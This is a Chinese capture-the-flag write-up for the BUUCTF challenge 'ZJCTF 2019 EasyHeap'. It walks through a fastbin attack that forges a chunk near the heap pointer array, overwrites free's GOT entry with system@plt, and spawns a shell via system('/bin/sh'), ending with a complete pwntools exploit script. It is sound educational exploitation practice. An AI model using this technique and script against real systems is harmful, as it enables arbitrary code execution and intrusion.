BUUCTF[PWN][fastbin attack]

admin2024-07-08  10

fastbin_attack例题


题目:[BUUCTF在线评测 (buuoj.cn)](https://buuoj.cn/challenges#[ZJCTF 2019]EasyHeap)

  • 整体思路:利用编辑时edit_heap函数的栈溢出漏洞,覆盖heaparray中的栈指针指向free的got表,将其改为system的plt表,从而劫持free函数,并且再向heaparray的另外一个指针指向的堆空间上写入字符串 /bin/sh/x00 ,再free掉该堆空间,就能变向执行system(“/bin/sh”)

解题:

  1. 题目中delete_heap函数在释放时将heaparray数组上的指针清0了,所以无法利用UAF:

    BUUCTF[PWN][fastbin attack],image-20240707170514509,第1张

  2. 但是在edit_heap函数中存在栈溢出漏洞,可以利用栈溢出覆盖fd伪造heap,再覆盖heaparray劫持free的got表(修改为system的plt表):

    BUUCTF[PWN][fastbin attack],image-20240707170555290,第2张

利用:

  1. 在heaparray前面找一个空间来伪造堆(后续要利用它覆盖掉heaparray数组里面的指针),这个伪造的堆上size值要与实际分配的大小(包含chunk头大小)相同(与size相差0x11):

    在0x00000000006020E0-0x33处刚好有一个空间中存储着0x7f,可以将地址0x6020ad作为伪造堆,那么0x7f就是size字段的值了,只要我们申请的空间为 0x7f-0x11=0x68 就能在释放后再次申请到该空间作为堆。

    BUUCTF[PWN][fastbin attack],第3张

    先申请三个堆,大小为0x68(实际分配的大小为0x7f),再释放掉heap2,利用heap2进行fastbin attack,实行任意地址申请堆(刚才找到的伪造堆)

    add(0x68,b'6')#0 用于写free的got为system
    add(0x68,b'6')#1 用于存放binsh和覆盖2
    add(0x68,b'6')#2 用于构造fastbin attack,写heap0指针为free的got表
    free(2) #释放到fastbin,进行fastbin attack,具体方式是修改fd为heap指针附近的地址
    

    BUUCTF[PWN][fastbin attack],image-20240707172942666,第4张

    编辑heap1.覆盖掉heap2的fd指针,并传参**“/bin/sh”** ,b’\x00’*0x60用来填充,p64(0x71)用来绕过size字段,p64(0x6020ad)就是修改的heap2的fd指针:

    edit(1,b'/bin/sh\x00'+b'\x00'*0x60+p64(0x71)+p64(0x6020ad))
    #在heap1写binsh,0x6020ad是刚才定位到的fake heap
    

    BUUCTF[PWN][fastbin attack],image-20240707174020028,第5张

    下面将heap2申请回来,再多申请一次就能得到我们前面伪造的堆0x6020ad,利用伪造的堆(heap3)进行堆溢出,覆盖掉heaparray上的heap0指针,指向free的got表:

    add(0x68,b'6')#把2恢复回来
    add(0x68,b'6')#创建fake heap,实际上是heap指针数组前面0x33
    edit(3,b'\x00'*0x23+p64(elf.got['free']))   #覆盖heap0为free的got表0x602018
    

    覆盖前:

    BUUCTF[PWN][fastbin attack],image-20240707174501881,第6张

    覆盖后,成功将heaparry[0]覆盖为free的got表:

    BUUCTF[PWN][fastbin attack],image-20240707174347784,第7张

    后面直接编辑heap0,就能将free的got表上的值,修改为system的plt。之所以不直接覆盖为system的got表是因为函数调用的过程,如果之前调用过一次,那么后续会直接用got表上的值作为函数的确切地址,rip直接跳转到该处来执行指令,所以要先去到system的plt位置执行指令(第一次调用system函数),直接用got表逻辑上说不通因为got表的位置根本不是指令(会报错):

    BUUCTF[PWN][fastbin attack],image-20240707175346698,第8张

    BUUCTF[PWN][fastbin attack],image-20240707174638591,第9张

    edit(0,p64(elf.plt['system']))#此时heap0的指针已经被修改指向了free的got表0x602018,
    

    劫持free的got表之前:

    BUUCTF[PWN][fastbin attack],image-20240707175913216,第10张

    劫持free的got表之之后:

    BUUCTF[PWN][fastbin attack],image-20240707180152357,第11张

    后面只要free掉heap1即可调用system(“/bin/sh”),因为heaparray[1]处的指针指向了 “/bin/sh” 字符串(前面覆盖的):

    free(1)#执行system(原来是free),heap1指向的位置已经被写'/bin/sh'字符串
    

    成功劫持到free函数,来执行 system(“/bin/sh”)

    BUUCTF[PWN][fastbin attack],image-20240707180952320,第12张

完整EXP:

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
#context(os='linux', arch='amd64')

# p = process('./pwn')
p = remote("node5.buuoj.cn",29165)
elf = ELF('./pwn')
# libc = ELF('./libc.so.6')

n2b = lambda x    : str(x).encode()
rv  = lambda x    : p.recv(x)
ru  = lambda s    : p.recvuntil(s)
sd  = lambda s    : p.send(s)
sl  = lambda s    : p.sendline(s)
sn  = lambda s    : sl(n2b(n))
sa  = lambda t, s : p.sendafter(t, s)
sla = lambda t, s : p.sendlineafter(t, s)
sna = lambda t, n : sla(t, n2b(n))
ia  = lambda      : p.interactive()
rop = lambda r    : flat([p64(x) for x in r])

if args.G:
    gdb.attach(p)

def add(size,content):
    sla(':','1')
    sla(':',str(size))
    sla(':',content)

def edit(idx, content):
    sla(':','2')
    sla(':',str(idx))
    sla(':',str(len(content)))
    sla(':',content)

def free(idx):
    sla(':','3')
    sla(':',str(idx))

add(0x68,b'6')#0 用于写free的got为system
add(0x68,b'6')#1 用于存放binsh和覆盖2
add(0x68,b'6')#2 用于构造fastbin attack,写heap0指针为free的got表
free(2)       #释放到fastbin,进行fastbin attack,具体方式是修改fd为heap指针附近的地址

edit(1,b'/bin/sh\x00'+b'\x00'*0x60+p64(0x71)+p64(0x6020ad))
#在heap1写binsh,0x6020ad是刚才定位到的fake heap

add(0x68,b'6')#把2恢复回来
add(0x68,b'6')#创建fake heap,实际上是heap指针数组前面0x33
edit(3,b'\x00'*0x23+p64(elf.got['free']))   #覆盖heap0为free的got表0x602018
edit(0,p64(elf.plt['system']))#此时heap0的指针已经被修改指向了free的got表0x602018,
# 直接往上面写数据协商system的plt表即可完成劫持,覆盖free的got为system的plt

free(1)#执行system(原来是free),heap1指向的位置已经被写'/bin/sh'字符串
ia()

BUUCTF[PWN][fastbin attack],image-20240707182207960,第13张

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明原文出处。如若内容造成侵权/违法违规/事实不符,请联系SD编程学习网:675289112@qq.com进行投诉反馈,一经查实,立即删除!